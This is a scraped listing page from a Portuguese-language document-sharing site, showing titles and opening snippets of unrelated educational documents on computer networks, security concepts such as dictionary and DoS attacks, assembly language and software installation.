Redes de Computadores 1 o Exame 28 de Junho de 2006 Nota prévia As respostas erradas nas questões de escolha múltipla descontam a cotação dessa questão a dividir pelo número de alternativas. O exame tem
Leia maisControle Parental. Introdução
Controle Parental Introdução O acesso das crianças à Internet suscita algumas preocupações aos pais e educadores/as. Contudo, tal como na vida real ou no uso de outros meios de comunicação, os adultos
Leia maiswww.projetoderedes.com.br Gestão da Segurança da Informação Professor: Maurício AULA 04 Tipos de Ataques
Ataque de Dicionário www.projetoderedes.com.br Trata-se de um ataque baseado em senhas que consiste na cifragem das palavras de um dicionário e posterior comparação com os arquivos de senhas de usuários.
Leia maisSEGURANÇA DO WINDOWS Análise sobre as APIs. Por: Fergo
SEGURANÇA DO WINDOWS Análise sobre as APIs Por: Fergo INTRODUÇÃO Você já se perguntou alguma vez sobre o porquê do Windows suscetível à falhas e a execução de códigos mal intencionados? Neste artigo eu
Leia maisRedes de Computadores 3ª Colecção Exercícios diversos 16 de Dezembro de 2005 Spanning Tree, Protocolo IP, Encaminhamento em redes IP e Cam.
I Bridging Transparente Spanning Tree 1) Considere a rede local, da figura. Admitindo que as bridges são transparentes e correm o algoritmo Spanning Tree (IEEE 802.1d) HOST Y HOST Z HOST X Bridge Prioridade
Leia maisPROCESSAMENTO DE DADOS
PROCESSAMENTO DE DADOS Aula 1 - Hardware Profa. Dra. Amanda Liz Pacífico Manfrim Perticarrari Profa. Dra. Amanda Liz Pacífico Manfrim Perticarrari 2 3 HARDWARE Todos os dispositivos físicos que constituem
Leia maisInstituto Superior Técnico. Projecto VoIP. Sistema IVVR
Instituto Superior Técnico Projecto VoIP Sistema IVVR 68239 Rui Barradas 68477 Helton Miranda 68626 Ludijor Barros 72487 Bruna Gondin Introdução O objectivo deste projecto é desenvolver um sistema de Interactive
Leia maisRedes de Computadores. Camada de Transporte de Dados: protocolos TCP e UDP Prof. MSc Hugo Vieira L. Souza
Redes de Computadores Camada de Transporte de Dados: protocolos TCP e UDP Prof. MSc Hugo Vieira L. Souza Este documento está sujeito a copyright. Todos os direitos estão reservados para o todo ou quaisquer
Leia maisConjunto de instruções e modos de. aula 4. Profa. Débora Matos
Conjunto de instruções e modos de endereçamento aula 4 Profa. Débora Matos Conjunto de Instruções A = ((B + C) x D + E F)/(G x H) A H denotam posições da memória endereços As arquiteturas possuem as seguintes
Leia maisPrint Audit 6 - Instalação do SQL Server 2008 express R2
Print Audit 6 - Instalação do SQL Server 2008 express R2 Este tutorial mostra a instalação e configuração passo a passo do SQLServer 2008 express R2. Antes de instalar o SQL Server 2008 Express R2 Antes
Leia maisRedes. Pablo Rodriguez de Almeida Gross
Redes Pablo Rodriguez de Almeida Gross Conceitos A seguir serão vistos conceitos básicos relacionados a redes de computadores. O que é uma rede? Uma rede é um conjunto de computadores interligados permitindo
Leia maisNetwork Top: Uma Ferramenta Automatizada para Análise e Gerenciamento de Redes
Network Top: Uma Ferramenta Automatizada para Análise e Gerenciamento de Redes Adriano K. Maron, Anderson B. Pinheiro 1 Universidade Católica de Pelotas (UCPEL) Caixa Postal 96010-000 Pelotas RS Brazil
Leia maisModelos de Camadas. Professor Leonardo Larback
Modelos de Camadas Professor Leonardo Larback Modelo OSI Quando surgiram, as redes de computadores eram, em sua totalidade, proprietárias, isto é, uma determinada tecnologia era suportada apenas por seu
Leia maisProtocolo de resolução de endereços: ARP
Protocolo de resolução de endereços: ARP Introdução, cache ARP, formato do pacote ARP, exemplos de ARP em acção, proxy ARP, ARP "Gratuito, comando arp. Endereço físico Os endereços IP fazem apenas sentido
Leia maisRedes de Computadores
Redes de Computadores Prof. Marcelo Gonçalves Rubinstein Programa de Pós-Graduação em Engenharia Eletrônica Faculdade de Engenharia Universidade do Estado do Rio de Janeiro Ementa Introdução a Redes de
Leia maisCOMPETÊNCIAS BÁSICAS EM TIC NAS EB1
COMPETÊNCIAS BÁSICAS EM TIC NAS EB1 Oficina do Correio Para saber mais sobre Correio electrónico 1. Dicas para melhor gerir e organizar o Correio Electrónico utilizando o Outlook Express Criar Pastas Escrever
Leia maisCCNA 2 Conceitos Básicos de Roteadores e Roteamento
CCNA 2 Conceitos Básicos de Roteadores e Roteamento Capítulo 10 - TCP/IP Intermediário 1 Objetivos do Capítulo Descrever o TCP e sua função; Descrever a sincronização e o controle de fluxo do TCP; Descrever
Leia maisGuia Rápido. Versão 9.0. Mover a perícia - não as pessoas
Guia Rápido Versão 9.0 Mover a perícia - não as pessoas Copyright 2006 Danware Data A/S. Partes utilizadas sob licença de terceiros. Todos os direitos reservados. Revisão do documento: 2006080 Por favor,
Leia maisAtaques DoS e DDoS. Alessandro Santos Germer Rafael Ambiel Faccioli Roberto Röseling Badô. 1. Introdução
Ataques DoS e DDoS Alessandro Santos Germer Rafael Ambiel Faccioli Roberto Röseling Badô 1. Introdução DoS - Denial of Service DDoS - Distributed Denial of Service Falhas no protocolo TCP/IP Ataques desde
Leia maisTE11008 Arquitetura e Organização de Computadores Nível da Linguagem de Montagem p. 1
TE11008 Arquitetura e Organização de Computadores Nível da Linguagem de Montagem Ronaldo de Freitas Zampolo LaPS/ENGCOMP/ITEC/UFPA TE11008 Arquitetura e Organização de Computadores Nível da Linguagem de
Leia maisLinguagem de Montagem
Linguagem de Montagem Procedimentos e a Pilha Slides baseados em material associado ao livro Introduction to Assembly Language Programming, Sivarama Dandamudi 1 O que é a pilha? A pilha é uma estrutura
Leia maisApresentação de REDES DE COMUNICAÇÃO
Apresentação de REDES DE COMUNICAÇÃO Curso Profissional de Técnico de Gestão e Programação de Sistemas Informáticos MÓDULO VIII Serviços de Redes Duração: 20 tempos Conteúdos (1) 2 Caraterizar, instalar
Leia maisCapítulo 9. Gerenciamento de rede
1 Capítulo 9 Gerenciamento de rede 2 Redes de computadores I Prof.: Leandro Soares de Sousa E-mail: leandro.uff.puro@gmail.com Site: http://www.ic.uff.br/~lsousa Não deixem a matéria acumular!!! Datas
Leia maisLuckas Andre Farias. Criptografia em hardware usando VHDL aplicado a VOIP
Luckas Andre Farias Criptografia em hardware usando VHDL aplicado a VOIP Londrina 2012 Luckas Andre Farias Criptografia em hardware usando VHDL aplicado a VOIP Trabalho de Conclusão de curso apresentado
Leia maisWindows 98 e Windows Me
Windows 98 e Windows Me "Etapas preliminares" na página 3-27 "Etapas de instalação rápida em CD-ROM" na página 3-28 "Outros métodos de instalação" na página 3-28 "Solução de problemas do Windows 98 e Windows
Leia mais